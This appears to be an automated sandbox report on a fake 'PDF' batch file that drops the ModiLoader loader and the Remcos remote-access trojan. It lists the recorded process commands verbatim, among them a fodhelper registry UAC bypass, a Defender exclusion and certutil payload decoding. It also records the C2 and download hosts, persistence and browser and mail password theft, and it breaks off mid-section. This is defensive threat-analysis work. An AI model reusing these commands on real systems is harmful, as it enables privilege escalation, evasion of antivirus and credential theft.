Malware Analysis Report

2025-01-02 03:19

Sample ID 240326-pvl7xadc6z
Target DEBIT_ADVICE_000610PAY001522024.PDF.tar.gz
SHA256 d1a3e9d965809db746d3dbe909753f38e2073737347cc8d5714c78969b352d06
Tags
modiloader remcos remotehost collection persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d1a3e9d965809db746d3dbe909753f38e2073737347cc8d5714c78969b352d06

Threat Level: Known bad

The file DEBIT_ADVICE_000610PAY001522024.PDF.tar.gz was found to be: Known bad.

Malicious Activity Summary

modiloader remcos remotehost collection persistence rat trojan

ModiLoader, DBatLoader

Remcos

Nirsoft

NirSoft MailPassView

ModiLoader Second Stage

NirSoft WebBrowserPassView

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Kills process with taskkill

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 12:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 12:39

Reported

2024-03-26 12:41

Platform

win7-20240221-en

Max time kernel

122s

Max time network

152s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\xkn.exe N/A
N/A N/A C:\Users\Public\xkn.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\colorcpl.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" C:\Users\Public\Libraries\Lewxa.com N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2108 set thread context of 2124 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
PID 2108 set thread context of 2484 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
PID 2108 set thread context of 2884 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\colorcpl.exe

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Lewxa.com N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Public\xkn.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\xkn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2456 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2888 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2888 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2116 wrote to memory of 2504 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2116 wrote to memory of 2504 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2116 wrote to memory of 2504 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2592 wrote to memory of 2632 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2592 wrote to memory of 2632 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2592 wrote to memory of 2632 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2456 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2688 wrote to memory of 1148 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2688 wrote to memory of 1148 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2688 wrote to memory of 1148 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 1148 wrote to memory of 2600 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 1148 wrote to memory of 2600 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 1148 wrote to memory of 2600 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 2600 wrote to memory of 2372 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 2372 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2600 wrote to memory of 2372 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2456 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2392 wrote to memory of 2440 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2392 wrote to memory of 2440 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2392 wrote to memory of 2440 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2456 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2820 wrote to memory of 2416 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2820 wrote to memory of 2416 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2820 wrote to memory of 2416 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2456 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2456 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2456 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2356 wrote to memory of 2172 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 2172 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 2172 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\429728.exe"

C:\Windows \System32\429728.exe

"C:\Windows \System32\429728.exe"

C:\Windows \System32\429728.exe

"C:\Windows \System32\429728.exe"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\System32\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\rtnl"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\bnaeuezy"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\dpgxuwkrtcw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 788

Network

Country Destination Domain Proto
US 8.8.8.8:53 1010.filemail.com udp
US 23.237.50.106:443 1010.filemail.com tcp
US 23.237.50.106:443 1010.filemail.com tcp
N/A 127.0.0.1:45671 tcp
N/A 127.0.0.1:55677 tcp
US 192.3.101.8:55677 tcp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

C:\Users\Public\xkn.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/1148-21-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

memory/1148-22-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-23-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-24-0x000000001B120000-0x000000001B402000-memory.dmp

memory/1148-25-0x0000000001D00000-0x0000000001D08000-memory.dmp

memory/1148-26-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/1148-31-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\kn.exe

MD5 6280628648abad0f367455549ee5e1c9
SHA1 423439425240825f8a1ae5b8650c873efa2b5086
SHA256 17907a23ff31b70fed7141addfb4b0b4ef06d3cd7cd00c4843c3eb99c20825fe
SHA512 df5d797996aaa0a3b41040ea84d6f26a86def06695e41eb94497683f93a6f34ee7e5d09b291f0e1cc357d4e9a98074b5740ab4f54a8aa18f5df33c8461d7eeb4

C:\Users\Public\kn.exe

MD5 9cd591e16329e8d6c2e4e173741be3d6
SHA1 50cf868810378901a16e2dd331d8ba49258716d3
SHA256 0a52fb96df41b3a56c4237b1ef4a4c254718213dde27a217960e0e65f19ecd32
SHA512 510e515b135575d773d6d4bced738f5b753de5b8812892000a4fe5391fe3abee8296f0cbb2cbb8a87f402a218cb9ac2b2c77d8a3a5f865dcbd5e9dbd2d211263

C:\Users\Public\kn.exe

MD5 edcac3744681d43e823f75cb83e60f1b
SHA1 600c72126e3e117f3ccc3fac152306e1e01b4262
SHA256 c804301e81225c9b22cc7ff359ee94a2c7e73cfced18df46a66f7f294248a340
SHA512 b2d3da4e4ab2b9f4e658817f6d5bbc34958b38999734c7e913e78db38d1f7f9f9c06a577319f23d1594dd22cf1eaf96226148c97148601e8cdcdeea91cac5753

C:\Users\Public\Lewxa.txt

MD5 2814120cc6f42ef208d9a13cb4ccc407
SHA1 2936e475cd97d4ba20029e4ccae4c49c6520fe51
SHA256 040a8f37736751babab04f2a7aaa4ba8920d95600167b05c0113ae1b1373ef92
SHA512 5b4e33d7516f26e3d1cdcdd5549fdc81852332e536cc7138468447aebf644b4a3a836c0decddcbf24fd7a70339fd3773cae68c16e677d90840ec9ecd5232274a

C:\Users\Public\Libraries\Lewxa.com

MD5 d4deb0e1e87b260afd60da800db2fc6d
SHA1 b8b2f6ca158cd7d0408a2aece92cde99b2dd24fb
SHA256 a62bff139e06d77a271591eb1c404776d7c39ece217d6695c5984693dbf14417
SHA512 8822168d4968ba66a1fbd1b6f9fed2b36b20f7bab8cffac8060645d49bca05e45583f2d2c870eb9f9b626e86afb6812384d4d65e94d16987e6db020db6aa51bb

memory/1572-45-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Public\alpha.exe

MD5 623ccab59dc69e79fa74cd7c2a63c8e0
SHA1 811b45c0c2bc67113684ac478719907da5a9932d
SHA256 19270f901d0b56e8fe4bf4006df1e58686ef191bf7480f2a0027354a2d191529
SHA512 fa3d8284c10c813b906ff5b202194b60910e4ef34201badb9e0fb2a86e6a60c09c3e79bda37b069363219fd165652b642d266c193386cd69d506cce287f9e36d

C:\Users\Public\Libraries\Lewxa.com

MD5 28abbd0440f992d9acdff6b232196491
SHA1 b0a2d2f3c2fdc6b20c218d20f593f54078b7574e
SHA256 0b03314ff8b7fc4993c1340e0f7802d2bc4eafedb2629c77d2d68511989bc546
SHA512 a885bc85ea84c958370383e2f653c4e7cb96395c1714b7e3ccc4faba5ded535ac3f9601c21bfbd609747dce1b851536a1ca120cc0b4c32e131d20ec664040ea0

C:\Users\Public\alpha.exe

MD5 97fbe5145ed5be80d5a272cbd5fc9f77
SHA1 1d871170692c4c0b150a47b2edf1def7d519689d
SHA256 10148bf21c3361ac464200a094b2a311571b24f4853abd47df1f358a2a9a3ef5
SHA512 5e1a163a2b9ed18036b4991bdda2ceca07b7b31ff5c94c10ac3cf0d58ccbcf7030aaa3f32763d409acbcd118318187d68555d710ecd5cd5d1a9b097fe2b3f55e

C:\Users\Public\xkn.exe

MD5 8b0835adecde8632b9369aad5b487b92
SHA1 9bd59b4ff9b0856cfcee1f01df17f65c63a97a84
SHA256 7a0b9fd4c1ec32b21f5ae4603bca4b773e4cb81371c8542204bc95782fc69bcf
SHA512 3c43c7d78d97df0d096db35b4533a4a17a69eaf003bbcb0087c7a4c06c729ba122385f53c50c162c22feee67f6f91aa3b8a39f2f732a8ef4311b60a8b9f9fbb4

memory/1572-52-0x0000000002DC0000-0x0000000003DC0000-memory.dmp

memory/1572-53-0x0000000002DC0000-0x0000000003DC0000-memory.dmp

memory/1572-56-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1572-57-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarD3E9.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Windows \System32\429728.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

memory/1268-123-0x0000000002480000-0x0000000002481000-memory.dmp

memory/2108-137-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-139-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-140-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-141-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-145-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-147-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-150-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-152-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-151-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-153-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2124-156-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2124-161-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2484-160-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2884-163-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2124-165-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2884-168-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2484-166-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2484-170-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2124-164-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2124-154-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2884-172-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-175-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-174-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2884-176-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2108-178-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2124-183-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rtnl

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2108-185-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2108-186-0x0000000000DC0000-0x0000000001DC0000-memory.dmp

memory/2484-189-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2108-188-0x0000000000360000-0x0000000000379000-memory.dmp

memory/2108-192-0x0000000000360000-0x0000000000379000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 12:39

Reported

2024-03-26 12:41

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Public\xkn.exe N/A

Loads dropped DLL

Description Indicator Process Target
